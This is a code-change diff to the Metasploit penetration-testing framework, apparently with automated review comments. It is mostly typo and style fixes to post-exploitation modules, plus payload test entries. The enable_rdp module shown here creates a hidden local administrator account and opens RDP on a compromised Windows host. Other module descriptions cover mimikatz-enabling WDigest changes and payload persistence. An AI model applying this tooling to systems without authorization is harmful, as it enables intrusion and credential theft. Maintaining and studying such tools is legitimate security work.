@@ -18,7 +18,7 @@ class MetasploitModule < Msf::Post 'Name' => 'Windows Gather Enumerate Active Domain Users', 'Description' => %q{ This module will enumerate computers included in the primary Domain and attempt - to list all locations the targeted user has sessions on. If a the HOST option is specified + to list all locations the targeted user has sessions on. If the HOST option is specified the module will target only that host. If the HOST is specified and USER is set to nil, all users logged into that host will be returned.' }, diff --git a/modules/post/windows/gather/memory_grep.rb b/modules/post/windows/gather/memory_grep.rb index 5ea88c3426..055b7e423d 100644 --- a/modules/post/windows/gather/memory_grep.rb +++ b/modules/post/windows/gather/memory_grep.rb @@ -9,7 +9,7 @@ class MetasploitModule < Msf::Post super( update_info(info, 'Name' => 'Windows Gather Process Memory Grep', 'Description' => %q{ - This module allows for searching the memory space of a proccess for potentially + This module allows for searching the memory space of a process for potentially sensitive data. Please note: When the HEAP option is enabled, the module will have to migrate to the process you are grepping, and will not migrate back automatically. This means that if the user terminates the application after using this module, you diff --git a/modules/post/windows/manage/add_user_domain.rb b/modules/post/windows/manage/add_user_domain.rb index ca66a3368e..14e7ca288a 100644 --- a/modules/post/windows/manage/add_user_domain.rb +++ b/modules/post/windows/manage/add_user_domain.rb 
@@ -12,7 +12,7 @@ class MetasploitModule < Msf::Post 'Description' => %q{ This module adds a user to the Domain and/or to a Domain group. It will check if sufficient privileges are present for certain actions and run - getprivs for system. If you elevated privs to system,the + getprivs for system. If you elevated privs to system, the SeAssignPrimaryTokenPrivilege will not be assigned. You need to migrate to a process that is running as system. If you don't have privs, this script exits. diff --git a/modules/post/windows/manage/enable_rdp.rb b/modules/post/windows/manage/enable_rdp.rb index b8e0fbdfc6..1ecc197401 100644 --- a/modules/post/windows/manage/enable_rdp.rb +++ b/modules/post/windows/manage/enable_rdp.rb 
@@ -10,33 +10,43 @@ class MetasploitModule < Msf::Post include Msf::Post::Windows::Priv include Msf::Post::File - def initialize(info={}) - super( update_info( info, - 'Name' => 'Windows Manage Enable Remote Desktop', - 'Description' => %q{ - This module enables the Remote Desktop Service (RDP). It provides the options to create - an account and configure it to be a member of the Local Administrators and - Remote Desktop Users group. It can also forward the target's port 3389/tcp.}, - 'License' => BSD_LICENSE, - 'Author' => [ 'Carlos Perez '], - 'Platform' => [ 'win' ], - 'SessionTypes' => [ 'meterpreter' ] - )) + def initialize(info = {}) + super( + update_info( + info, + 'Name' => 'Windows Manage Enable Remote Desktop', + 'Description' => %q{ + This module enables the Remote Desktop Service (RDP). It provides the options to create + an account and configure it to be a member of the Local Administrators and + Remote Desktop Users group. It can also forward the target's port 3389/tcp.}, + 'License' => BSD_LICENSE, + 'Author' => [ 'Carlos Perez '], + 'Platform' => [ 'win' ], + 'SessionTypes' => [ 'meterpreter' ] + ) + ) register_options( [ OptString.new('USERNAME', [ false, 'The username of the user to create.' ]), OptString.new('PASSWORD', [ false, 'Password for the user created.' 
]), - OptBool.new( 'ENABLE', [ false, 'Enable the RDP Service and Firewall Exception.', true]), - OptBool.new( 'FORWARD', [ false, 'Forward remote port 3389 to local Port.', false]), - OptInt.new( 'LPORT', [ false, 'Local port to forward remote connection.', 3389]) - ]) + OptBool.new('ENABLE', [ false, 'Enable the RDP Service and Firewall Exception.', true]), + OptBool.new('FORWARD', [ false, 'Forward remote port 3389 to local Port.', false]), + OptInt.new('LPORT', [ false, 'Local port to forward remote connection.', 3389]) + ] + ) end def run - if datastore['ENABLE'] or (datastore['USERNAME'] and datastore['PASSWORD']) - cleanup_rc = store_loot("host.windows.cleanup.enable_rdp", "text/plain", session,"" , - "enable_rdp_cleanup.rc", "enable_rdp cleanup resource file") + if datastore['ENABLE'] || (datastore['USERNAME'] && datastore['PASSWORD']) + cleanup_rc = store_loot( + "host.windows.cleanup.enable_rdp", + "text/plain", + session, + "", + "enable_rdp_cleanup.rc", + "enable_rdp cleanup resource file" + ) if datastore['ENABLE'] if is_admin? @@ -46,9 +56,9 @@ class MetasploitModule < Msf::Post print_error("Insufficient privileges, Remote Desktop Service was not modified") end end - if datastore['USERNAME'] and datastore['PASSWORD'] + if datastore['USERNAME'] && datastore['PASSWORD'] if is_admin? - addrdpusr(datastore['USERNAME'], datastore['PASSWORD'],cleanup_rc) + addrdpusr(datastore['USERNAME'], datastore['PASSWORD'], cleanup_rc) else print_error("Insufficient privileges, account was not be created.") end 
@@ -65,21 +75,20 @@ class MetasploitModule < Msf::Post key = 'HKLM\\System\\CurrentControlSet\\Control\\Terminal Server' value = "fDenyTSConnections" begin - v = registry_getvaldata(key,value) + v = registry_getvaldata(key, value) print_status "Enabling Remote Desktop" if v == 1 print_status "\tRDP is disabled; enabling it ..." - registry_setvaldata(key,value,0,"REG_DWORD") - file_local_write(cleanup_rc,"reg setval -k \'HKLM\\System\\CurrentControlSet\\Control\\Terminal Server\' -v 'fDenyTSConnections' -d \"1\"") + registry_setvaldata(key, value, 0, "REG_DWORD") + file_local_write(cleanup_rc, "reg setval -k \'HKLM\\System\\CurrentControlSet\\Control\\Terminal Server\' -v 'fDenyTSConnections' -d \"1\"") else print_status "\tRDP is already enabled" end - rescue::Exception => e + rescue StandardError => e print_status("The following Error was encountered: #{e.class} #{e}") end end - def enabletssrv(cleanup_rc) service_name = "termservice" srv_info = service_info(service_name) 
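Review bot: Narrowing the rescue to `StandardError` is the right change, but the handler in this hunk still reports the failure with `print_status("The following Error was encountered: #{e.class} #{e}")` and then returns normally, so a registry write that fails leaves RDP disabled while the caller sees only an informational line. `print_error` would make the failed step visible at the right severity; the same handler appears in the `enabletssrv` and `addrdpusr` hunks (L392 and L394), where it also swallows a failed service-start or group-add. `enablerd`'s signature is outside this hunk, and `registry_setvaldata`'s return value is not checked here either, so it may be worth confirming whether it raises or returns false on failure.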
@@ -87,32 +96,27 @@ class MetasploitModule < Msf::Post print_status "Setting Terminal Services service startup mode" if srv_info[:starttype] != START_TYPE_AUTO print_status "\tThe Terminal Services service is not set to auto, changing it to auto ..." - unless (service_change_config(service_name, {:starttype => "START_TYPE_AUTO"}) == Windows::Error::SUCCESS) + unless service_change_config(service_name, starttype: "START_TYPE_AUTO") == Windows::Error::SUCCESS print_error("\tUnable to change start type to Auto") end - file_local_write(cleanup_rc,"execute -H -f cmd.exe -a \"/c sc config termservice start= disabled\"") - if (service_start(service_name) == Windows::Error::SUCCESS) + file_local_write(cleanup_rc, "execute -H -f cmd.exe -a \"/c sc config termservice start= disabled\"") + if service_start(service_name) == Windows::Error::SUCCESS print_good("\tRDP Service Started") end - file_local_write(cleanup_rc,"execute -H -f cmd.exe -a \"/c sc stop termservice\"") + file_local_write(cleanup_rc, "execute -H -f cmd.exe -a \"/c sc stop termservice\"") else print_status "\tTerminal Services service is already set to auto" end - #Enabling Exception on the Firewall + # Enabling Exception on the Firewall print_status "\tOpening port in local firewall if necessary" cmd_exec('netsh', 'firewall set service type = remotedesktop mode = enable', 30) - file_local_write(cleanup_rc,"execute -H -f cmd.exe -a \"/c 'netsh firewall set service type = remotedesktop mode = enable'\"") - rescue::Exception => e + file_local_write(cleanup_rc, "execute -H -f cmd.exe -a \"/c 'netsh firewall set service type = remotedesktop mode = enable'\"") + rescue StandardError => e print_status("The following Error was encountered: #{e.class} #{e}") end end - - - def addrdpusr(username, password,cleanup_rc) - rdu = resolve_sid("S-1-5-32-555")[:name] - admin = resolve_sid("S-1-5-32-544")[:name] - + def addrdpusr(username, password, cleanup_rc) print_status "Setting user account for logon" print_status "\tAdding 
User: #{username} with Password: #{password}" begin @@ -121,6 +125,19 @@ class MetasploitModule < Msf::Post return end + rdu_sid = resolve_sid("S-1-5-32-555") + admin_sid = resolve_sid("S-1-5-32-544") + + if !rdu_sid[:mapped] || !admin_sid[:mapped] + print_error("\tThe Remote Desktop Users group is not mapped") if !rdu_sid[:mapped] + print_error("\tThe Administrators group is not mapped") if !admin_sid[:mapped] + print_error("\tNot adding user #{username}") + return + end + + rdu = rdu_sid[:name] + admin = admin_sid[:name] + user_added = false addusr_out = cmd_exec("cmd.exe", "/c net user #{username} #{password} /add") 
@@ -131,16 +148,16 @@ class MetasploitModule < Msf::Post end if user_added - file_local_write(cleanup_rc,"execute -H -f cmd.exe -a \"/c net user #{username} /delete\"") + file_local_write(cleanup_rc, "execute -H -f cmd.exe -a \"/c net user #{username} /delete\"") print_status "\tAdding User: #{username} to local group '#{rdu}'" - cmd_exec("cmd.exe","/c net localgroup \"#{rdu}\" #{username} /add") + cmd_exec("cmd.exe", "/c net localgroup \"#{rdu}\" #{username} /add") print_status "\tHiding user from Windows Login screen" hide_user_key = 'HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\UserList' - registry_setvaldata(hide_user_key,username,0,"REG_DWORD") - file_local_write(cleanup_rc,"reg deleteval -k HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\ NT\\\\CurrentVersion\\\\Winlogon\\\\SpecialAccounts\\\\UserList -v #{username}") + registry_setvaldata(hide_user_key, username, 0, "REG_DWORD") + file_local_write(cleanup_rc, "reg deleteval -k HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\ NT\\\\CurrentVersion\\\\Winlogon\\\\SpecialAccounts\\\\UserList -v #{username}") print_status "\tAdding User: #{username} to local group '#{admin}'" - cmd_exec("cmd.exe","/c net localgroup #{admin} #{username} /add") + cmd_exec("cmd.exe", "/c net localgroup #{admin} #{username} /add") print_status "You can now login with the created user" else print_error("Account could not be created") @@ -149,17 +166,12 @@ class MetasploitModule < Msf::Post print_error("\t#{l.chomp}") end end - rescue ::Exception => e + rescue StandardError => e print_status("The following Error was encountered: #{e.class} #{e}") end end def check_user(user) - output = cmd_exec('cmd.exe', '/c net user') - if output.include?(user) - return true - end - - false + cmd_exec('cmd.exe', '/c net user').include?(user) end end diff --git a/modules/post/windows/manage/forward_pageant.rb b/modules/post/windows/manage/forward_pageant.rb index 4c60ac8ad8..acd23d3410 100644 
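Review bot: The collapsed `check_user` in the last hunk keeps substring matching, `cmd_exec('cmd.exe', '/c net user').include?(user)`, so it answers true for `bob` when only `bobby` (or any header text containing the name) is present; the refactor preserves that behaviour rather than fixing it. Comparing whole tokens is closer to what the name promises: `cmd_exec('cmd.exe', '/c net user').split(/\s+/).any? { |n| n.casecmp(user).zero? }` (note that `net user` prints names in columns, so account names containing spaces would still need special handling). Where `check_user` is called is outside this hunk, so whether a false positive leads to skipping the `net user /add` step cannot be confirmed from here.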
--- a/modules/post/windows/manage/forward_pageant.rb +++ b/modules/post/windows/manage/forward_pageant.rb @@ -15,7 +15,7 @@ class MetasploitModule < Msf::Post This module forwards SSH agent requests from a local socket to a remote Pageant instance. If a target Windows machine is compromised and is running Pageant, this will allow the attacker to run normal OpenSSH commands (e.g. ssh-add -l) against the Pageant host which are - tunnelled through the meterpreter session. This could therefore be used to authenticate + tunneled through the meterpreter session. This could therefore be used to authenticate with a remote host using a private key which is loaded into a remote user's Pageant instance, without ever having knowledge of the private key itself. diff --git a/modules/post/windows/manage/persistence_exe.rb b/modules/post/windows/manage/persistence_exe.rb index 605e5391a8..76ef787818 100644 --- a/modules/post/windows/manage/persistence_exe.rb +++ b/modules/post/windows/manage/persistence_exe.rb @@ -20,7 +20,7 @@ class MetasploitModule < Msf::Post super(update_info(info, 'Name' => 'Windows Manage Persistent EXE Payload Installer', 'Description' => %q( - This Module will upload a executable to a remote host and make it Persistent. + This Module will upload an executable to a remote host and make it Persistent. It can be installed as USER, SYSTEM, or SERVICE. USER will start on user login, SYSTEM will start on system boot but requires privs. SERVICE will create a new service which will start the payload. Again requires privs. diff --git a/modules/post/windows/manage/priv_migrate.rb b/modules/post/windows/manage/priv_migrate.rb index 3b112f5d83..3c918bf6f1 100644 --- a/modules/post/windows/manage/priv_migrate.rb +++ b/modules/post/windows/manage/priv_migrate.rb 
@@ -13,7 +13,7 @@ class MetasploitModule < Msf::Post super( update_info( info, 'Name' => 'Windows Manage Privilege Based Process Migration ', 'Description' => %q{ This module will migrate a Meterpreter session based on session privileges. - It will do everything it can to migrate, including spawing a new User level process. + It will do everything it can to migrate, including spawning a new User level process. For sessions with Admin rights: It will try to migrate into a System level process in the following order: ANAME (if specified), services.exe, wininit.exe, svchost.exe, lsm.exe, lsass.exe, and winlogon.exe. If all these fail and NOFAIL is set to true, it will fall back to User level migration. For sessions with User level rights: diff --git a/modules/post/windows/manage/run_as.rb b/modules/post/windows/manage/run_as.rb index ac31720386..55793f962c 100644 --- a/modules/post/windows/manage/run_as.rb +++ b/modules/post/windows/manage/run_as.rb @@ -15,7 +15,7 @@ class MetasploitModule < Msf::Post This module will login with the specified username/password and execute the supplied command as a hidden process. Output is not returned by default, by setting CMDOUT to false output will be redirected to a temp file and read back in to - display.By setting advanced option SETPASS to true, it will reset the users + display. By setting advanced option SETPASS to true, it will reset the users password and then execute the command. ), 'License' => MSF_LICENSE, diff --git a/modules/post/windows/manage/vss_set_storage.rb b/modules/post/windows/manage/vss_set_storage.rb index 4fafdf6d54..84227f6225 100644 --- a/modules/post/windows/manage/vss_set_storage.rb +++ b/modules/post/windows/manage/vss_set_storage.rb 
@@ -11,7 +11,7 @@ class MetasploitModule < Msf::Post super(update_info(info, 'Name' => "Windows Manage Set Shadow Copy Storage Space", 'Description' => %q{ - This module will attempt to change the ammount of space + This module will attempt to change the amount of space for volume shadow copy storage. This is based on the VSSOwn Script originally posted by Tim Tomes and Mark Baggett. diff --git a/modules/post/windows/manage/wdigest_caching.rb b/modules/post/windows/manage/wdigest_caching.rb index eac3ea9815..85de72a541 100644 --- a/modules/post/windows/manage/wdigest_caching.rb +++ b/modules/post/windows/manage/wdigest_caching.rb @@ -17,7 +17,7 @@ class MetasploitModule < Msf::Post 'Description' => %q{ On Windows 8/2012 or higher, the Digest Security Provider (WDIGEST) is disabled by default. This module enables/disables credential caching by adding/changing the value of the UseLogonCredential DWORD under the WDIGEST provider's Registry key. - Any subsequest logins will allow mimikatz to recover the plain text passwords from the system's memory. + Any subsequent logins will allow mimikatz to recover the plain text passwords from the system's memory. }, 'License' => MSF_LICENSE, 'Author' => [ 'Kostas Lintovois '], diff --git a/modules/post/windows/recon/computer_browser_discovery.rb b/modules/post/windows/recon/computer_browser_discovery.rb index b3b7d80850..d40a25a614 100644 --- a/modules/post/windows/recon/computer_browser_discovery.rb +++ b/modules/post/windows/recon/computer_browser_discovery.rb 
@@ -14,7 +14,7 @@ class MetasploitModule < Msf::Post 'Description' => %q{ This module uses railgun to discover hostnames and IPs on the network. LTYPE should be set to one of the following values: WK (all workstations), SVR (all servers), SQL (all SQL servers), DC (all Domain Controllers), DCBKUP (all Domain Backup Servers), - NOVELL (all Novell servers), PRINTSVR (all Print Que servers), MASTERBROWSER (all Master Browswers), + NOVELL (all Novell servers), PRINTSVR (all Print Que servers), MASTERBROWSER (all Master Browsers), WINDOWS (all Windows hosts), or UNIX (all Unix hosts). }, 'License' => MSF_LICENSE, diff --git a/modules/post/windows/wlan/wlan_profile.rb b/modules/post/windows/wlan/wlan_profile.rb index c99764869c..fd87fb713e 100644 --- a/modules/post/windows/wlan/wlan_profile.rb +++ b/modules/post/windows/wlan/wlan_profile.rb @@ -13,7 +13,7 @@ class MetasploitModule < Msf::Post 'Name' => 'Windows Gather Wireless Profile', 'Description' => %q{ This module extracts saved Wireless LAN profiles. It will also try to decrypt - the network key material. Behaviour is slightly different between OS versions + the network key material. Behavior is slightly different between OS versions when it comes to WPA. In Windows Vista/7 we will get the passphrase. In Windows XP we will get the PBKDF2 derived key. }, diff --git a/msfd b/msfd index 10d79794d2..fddd17fe05 100755 --- a/msfd +++ b/msfd @@ -19,8 +19,6 @@ end $:.unshift(File.expand_path(File.join(File.dirname(msfbase), 'lib'))) require 'msfenv' - - $:.unshift(ENV['MSF_LOCAL_LIB']) if ENV['MSF_LOCAL_LIB'] require 'msf/base' diff --git a/msfrpc b/msfrpc index cd6df8cd10..c75a8ff47d 100755 --- a/msfrpc +++ b/msfrpc @@ -17,8 +17,6 @@ end $:.unshift(File.expand_path(File.join(File.dirname(msfbase), 'lib'))) require 'msfenv' - - $:.unshift(ENV['MSF_LOCAL_LIB']) if ENV['MSF_LOCAL_LIB'] require 'rex/parser/arguments' 
@@ -59,7 +57,6 @@ arguments.parse(ARGV) do |opt, idx, val| end end - unless opts['ServerHost'] $stderr.puts "[-] Error: a server IP must be specified (-a)" $stderr.puts arguments.usage @@ -93,4 +90,3 @@ while(ARGV.shift) end Rex::Ui::Text::IrbShell.new(binding).run - diff --git a/msfrpcd b/msfrpcd index bfb882c3e3..e3c5103c22 100755 --- a/msfrpcd +++ b/msfrpcd @@ -17,8 +17,6 @@ end $:.unshift(File.expand_path(File.join(File.dirname(msfbase), 'lib'))) require 'msfenv' - - $:.unshift(ENV['MSF_LOCAL_LIB']) if ENV['MSF_LOCAL_LIB'] require 'rex/parser/arguments' diff --git a/msfvenom b/msfvenom index 2766360baf..eb7b7f6dbb 100755 --- a/msfvenom +++ b/msfvenom @@ -16,7 +16,6 @@ require 'msf/ui' require 'msf/base' require 'msf/core/payload_generator' - class MsfVenomError < StandardError; end class HelpError < StandardError; end class UsageError < MsfVenomError; end diff --git a/spec/modules/payloads_spec.rb b/spec/modules/payloads_spec.rb index cd4f55922c..69578c7a31 100644 --- a/spec/modules/payloads_spec.rb +++ b/spec/modules/payloads_spec.rb @@ -548,6 +548,16 @@ RSpec.describe 'modules/payloads', :content do reference_name: 'cmd/unix/bind_perl_ipv6' end + context 'cmd/unix/bind_r' do + it_should_behave_like 'payload cached size is consistent', + ancestor_reference_names: [ + 'singles/cmd/unix/bind_r' + ], + dynamic_size: false, + modules_pathname: modules_pathname, + reference_name: 'cmd/unix/bind_r' + end + context 'cmd/unix/bind_ruby' do it_should_behave_like 'payload cached size is consistent', ancestor_reference_names: [ 
@@ -748,6 +758,16 @@ RSpec.describe 'modules/payloads', :content do reference_name: 'cmd/unix/reverse_python_ssl' end + context 'cmd/unix/reverse_r' do + it_should_behave_like 'payload cached size is consistent', + ancestor_reference_names: [ + 'singles/cmd/unix/reverse_r' + ], + dynamic_size: false, + modules_pathname: modules_pathname, + reference_name: 'cmd/unix/reverse_r' + end + context 'cmd/unix/reverse_ruby' do it_should_behave_like 'payload cached size is consistent', ancestor_reference_names: [ 
@@ -1104,6 +1124,48 @@ RSpec.describe 'modules/payloads', :content do reference_name: 'java/shell_reverse_tcp' end + context 'linux/aarch64/shell_reverse_tcp' do + it_should_behave_like 'payload cached size is consistent', + ancestor_reference_names: [ + 'singles/linux/aarch64/shell_reverse_tcp' + ], + dynamic_size: false, + modules_pathname: modules_pathname, + reference_name: 'linux/aarch64/shell_reverse_tcp' + end + + context 'linux/aarch64/meterpreter_reverse_http' do + it_should_behave_like 'payload cached size is consistent', + ancestor_reference_names: [ + 'singles/linux/aarch64/meterpreter_reverse_http' + ], + dynamic_size: false, + modules_pathname: modules_pathname, + reference_name: 'linux/aarch64/meterpreter_reverse_http' + end + + context 'linux/aarch64/meterpreter_reverse_https' do + it_should_behave_like 'payload cached size is consistent', + ancestor_reference_names: [ + 'singles/linux/aarch64/meterpreter_reverse_https' + ], + dynamic_size: false, + modules_pathname: modules_pathname, + reference_name: 'linux/aarch64/meterpreter_reverse_https' + end + + context 'linux/aarch64/shell/reverse_tcp' do + it_should_behave_like 'payload cached size is consistent', + ancestor_reference_names: [ + 'stagers/linux/aarch64/reverse_tcp', + 'stages/linux/aarch64/shell' + ], + dynamic_size: false, + modules_pathname: modules_pathname, + reference_name: 'linux/aarch64/shell/reverse_tcp' + end + + context 'linux/armbe/shell_bind_tcp' do it_should_behave_like 'payload cached size is consistent', ancestor_reference_names: [ 
@@ -2867,6 +2929,17 @@ RSpec.describe 'modules/payloads', :content do reference_name: 'windows/meterpreter/reverse_ipv6_tcp' end + context 'windows/meterpreter/reverse_named_pipe' do + it_should_behave_like 'payload cached size is consistent', + ancestor_reference_names: [ + 'stagers/windows/reverse_named_pipe', + 'stages/windows/meterpreter' + ], + dynamic_size: false, + modules_pathname: modules_pathname, + reference_name: 'windows/meterpreter/reverse_named_pipe' + end + context 'windows/meterpreter/reverse_nonx_tcp' do it_should_behave_like 'payload cached size is consistent', ancestor_reference_names: [ @@ -3826,6 +3899,17 @@ RSpec.describe 'modules/payloads', :content do reference_name: 'windows/x64/meterpreter/reverse_https' end + context 'windows/x64/meterpreter/reverse_named_pipe' do + it_should_behave_like 'payload cached size is consistent', + ancestor_reference_names: [ + 'stagers/windows/x64/reverse_named_pipe', + 'stages/windows/x64/meterpreter' + ], + dynamic_size: false, + modules_pathname: modules_pathname, + reference_name: 'windows/x64/meterpreter/reverse_named_pipe' + end + context 'windows/x64/meterpreter/reverse_tcp' do it_should_behave_like 'payload cached size is consistent', ancestor_reference_names: [ 
@@ -4200,66 +4284,6 @@ RSpec.describe 'modules/payloads', :content do reference_name: 'windows/meterpreter/reverse_winhttps' end - context 'linux/aarch64/meterpreter_reverse_http' do - it_should_behave_like 'payload cached size is consistent', - ancestor_reference_names: [ - 'singles/linux/aarch64/meterpreter_reverse_http' - ], - dynamic_size: false, - modules_pathname: modules_pathname, - reference_name: 'linux/aarch64/meterpreter_reverse_http' - end - - context 'linux/aarch64/meterpreter_reverse_https' do - it_should_behave_like 'payload cached size is consistent', - ancestor_reference_names: [ - 'singles/linux/aarch64/meterpreter_reverse_https' - ], - dynamic_size: false, - modules_pathname: modules_pathname, - reference_name: 'linux/aarch64/meterpreter_reverse_https' - end - - context 'linux/armbe/meterpreter_reverse_http' do - it_should_behave_like 'payload cached size is consistent', - ancestor_reference_names: [ - 'singles/linux/armbe/meterpreter_reverse_http' - ], - dynamic_size: false, - modules_pathname: modules_pathname, - reference_name: 'linux/armbe/meterpreter_reverse_http' - end - - context 'linux/armbe/meterpreter_reverse_https' do - it_should_behave_like 'payload cached size is consistent', - ancestor_reference_names: [ - 'singles/linux/armbe/meterpreter_reverse_https' - ], - dynamic_size: false, - modules_pathname: modules_pathname, - reference_name: 'linux/armbe/meterpreter_reverse_https' - end - - context 'linux/armle/meterpreter_reverse_http' do - it_should_behave_like 'payload cached size is consistent', - ancestor_reference_names: [ - 'singles/linux/armle/meterpreter_reverse_http' - ], - dynamic_size: false, - modules_pathname: modules_pathname, - reference_name: 'linux/armle/meterpreter_reverse_http' - end - - context 'linux/armle/meterpreter_reverse_https' do - it_should_behave_like 'payload cached size is consistent', - ancestor_reference_names: [ - 'singles/linux/armle/meterpreter_reverse_https' - ], - dynamic_size: false, - 
modules_pathname: modules_pathname, - reference_name: 'linux/armle/meterpreter_reverse_https' - end - context 'linux/mips64/meterpreter_reverse_http' do it_should_behave_like 'payload cached size is consistent', ancestor_reference_names: [ @@ -4440,6 +4464,17 @@ RSpec.describe 'modules/payloads', :content do reference_name: 'linux/zarch/meterpreter_reverse_https' end + context 'linux/aarch64/meterpreter/reverse_tcp' do + it_should_behave_like 'payload cached size is consistent', + ancestor_reference_names: [ + 'stagers/linux/aarch64/reverse_tcp', + 'stages/linux/aarch64/meterpreter' + ], + dynamic_size: false, + modules_pathname: modules_pathname, + reference_name: 'linux/aarch64/meterpreter/reverse_tcp' + end + context 'linux/aarch64/meterpreter_reverse_tcp' do it_should_behave_like 'payload cached size is consistent', ancestor_reference_names: [ 
@@ -4460,6 +4495,46 @@ RSpec.describe 'modules/payloads', :content do reference_name: 'linux/armbe/meterpreter_reverse_tcp' end + context 'linux/armbe/meterpreter_reverse_http' do + it_should_behave_like 'payload cached size is consistent', + ancestor_reference_names: [ + 'singles/linux/armbe/meterpreter_reverse_http' + ], + dynamic_size: false, + modules_pathname: modules_pathname, + reference_name: 'linux/armbe/meterpreter_reverse_http' + end + + context 'linux/armbe/meterpreter_reverse_https' do + it_should_behave_like 'payload cached size is consistent', + ancestor_reference_names: [ + 'singles/linux/armbe/meterpreter_reverse_https' + ], + dynamic_size: false, + modules_pathname: modules_pathname, + reference_name: 'linux/armbe/meterpreter_reverse_https' + end + + context 'linux/armle/meterpreter_reverse_http' do + it_should_behave_like 'payload cached size is consistent', + ancestor_reference_names: [ + 'singles/linux/armle/meterpreter_reverse_http' + ], + dynamic_size: false, + modules_pathname: modules_pathname, + reference_name: 'linux/armle/meterpreter_reverse_http' + end + + context 'linux/armle/meterpreter_reverse_https' do + it_should_behave_like 'payload cached size is consistent', + ancestor_reference_names: [ + 'singles/linux/armle/meterpreter_reverse_https' + ], + dynamic_size: false, + modules_pathname: modules_pathname, + reference_name: 'linux/armle/meterpreter_reverse_https' + end + context 'linux/armle/meterpreter/bind_tcp' do it_should_behave_like 'payload cached size is consistent', ancestor_reference_names: [ 
@@ -4726,4 +4801,23 @@ RSpec.describe 'modules/payloads', :content do reference_name: 'linux/zarch/meterpreter_reverse_tcp' end + context 'r/shell_bind_tcp' do + it_should_behave_like 'payload cached size is consistent', + ancestor_reference_names: [ + 'singles/r/shell_bind_tcp' + ], + dynamic_size: false, + modules_pathname: modules_pathname, + reference_name: 'r/shell_bind_tcp' + end + + context 'r/shell_reverse_tcp' do + it_should_behave_like 'payload cached size is consistent', + ancestor_reference_names: [ + 'singles/r/shell_reverse_tcp' + ], + dynamic_size: false, + modules_pathname: modules_pathname, + reference_name: 'r/shell_reverse_tcp' + end end diff --git a/tools/dev/msftidy.rb b/tools/dev/msftidy.rb index 2cf50f9f82..11691c7bd1 100755 --- a/tools/dev/msftidy.rb +++ b/tools/dev/msftidy.rb @@ -43,9 +43,10 @@ end class Msftidy # Status codes - OK = 0x00 - WARNINGS = 0x10 - ERRORS = 0x20 + OK = 0 + INFO = 1 + WARNING = 2 + ERROR = 3 # Some compiles regexes REGEX_MSF_EXPLOIT = / \< Msf::Exploit/ @@ -73,7 +74,7 @@ class Msftidy # error. def warn(txt, line=0) line_msg = (line>0) ? ":#{line}" : '' puts "#{@full_filepath}#{line_msg} - [#{'WARNING'.yellow}] #{cleanup_text(txt)}" - @status == ERRORS ? @status = ERRORS : @status = WARNINGS + @status += WARNING end # @@ -85,7 +86,7 @@ class Msftidy def error(txt, line=0) line_msg = (line>0) ? ":#{line}" : '' puts "#{@full_filepath}#{line_msg} - [#{'ERROR'.red}] #{cleanup_text(txt)}" - @status = ERRORS + @status += ERROR end # Currently unused, but some day msftidy will fix errors for you. @@ -101,6 +102,7 @@ class Msftidy return if SUPPRESS_INFO_MESSAGES line_msg = (line>0) ? ":#{line}" : '' puts "#{@full_filepath}#{line_msg} - [#{'INFO'.cyan}] #{cleanup_text(txt)}" + @status += INFO end ## diff --git a/tools/modules/module_description.rb b/tools/modules/module_description.rb new file mode 100644 index 0000000000..3816bfa8f4 --- /dev/null +++ b/tools/modules/module_description.rb 
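Review bot: In the msftidy hunks, `@status += WARNING`, `@status += ERROR` and the new `@status += INFO` turn the status into a running sum rather than a severity, so two warnings (4) outrank one error (3) and three informational messages also reach 3; whatever reads `@status` after the run (outside these hunks) can no longer tell those cases apart, and a file that only produced INFO output now ends with a non-zero status where it previously stayed OK. If the intent is "highest severity seen", the three lines should be `@status = [@status, INFO].max`, `@status = [@status, WARNING].max` and `@status = [@status, ERROR].max`; if the intent really is a count, keep separate counters per level instead of folding them into one integer. A one-line comment above the constants stating which of the two `@status` represents would also spare the next reader this guesswork.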
@@ -0,0 +1,84 @@
+#!/usr/bin/env ruby
+#
+# $Id$
+#
+# This script lists each module with its description
+#
+# $Revision$
+#
+
+msfbase = __FILE__
+while File.symlink?(msfbase)
+  msfbase = File.expand_path(File.readlink(msfbase), File.dirname(msfbase))
+end
+
+$:.unshift(File.expand_path(File.join(File.dirname(msfbase), '..', '..', 'lib')))
+require 'msfenv'
+
+$:.unshift(ENV['MSF_LOCAL_LIB']) if ENV['MSF_LOCAL_LIB']
+
+require 'rex'
+require 'msf/ui'
+require 'msf/base'
+
+sort = 0
+filter= 'All'
+filters = ['all','exploit','payload','post','nop','encoder','auxiliary']
+
+opts = Rex::Parser::Arguments.new(
+  "-h" => [ false, "Help menu." ],
+  "-f" => [ true, "Filter based on Module Type [#{filters.map{|f|f.capitalize}.join(", ")}] (Default = All)."],
+)
+
+opts.parse(ARGV) { |opt, idx, val|
+  case opt
+  when "-h"
+    puts "\nMetasploit Script for Displaying Module Descriptions."
+    puts "=========================================================="
+    puts opts.usage
+    exit
+  when "-f"
+    unless filters.include?(val.downcase)
+      puts "Invalid Filter Supplied: #{val}"
+      puts "Please use one of these: #{filters.map{|f|f.capitalize}.join(", ")}"
+      exit
+    end
+    puts "Module Filter: #{val}"
+    filter = val
+
+  end
+
+}
+
+
+Indent = ' '
+
+# Always disable the database (we never need it just to list module
+# information).
+framework_opts = { 'DisableDatabase' => true }
+
+# If the user only wants a particular module type, no need to load the others
+if filter.downcase != 'all'
+  framework_opts[:module_types] = [ filter.downcase ]
+end
+
+# Initialize the simplified framework instance.
+$framework = Msf::Simple::Framework.create(framework_opts)
+
+
+tbl = Rex::Text::Table.new(
+  'Header' => 'Module Descriptions',
+  'Indent' => Indent.length,
+  'Columns' => [ 'Module', 'Description' ]
+)
+
+$framework.modules.each { |name, mod|
+  x = mod.new
+  tbl << [ x.fullname, x.description ]
+}
+
+if sort == 1
+  tbl.sort_rows(1)
+end
+
+puts tbl.to_s
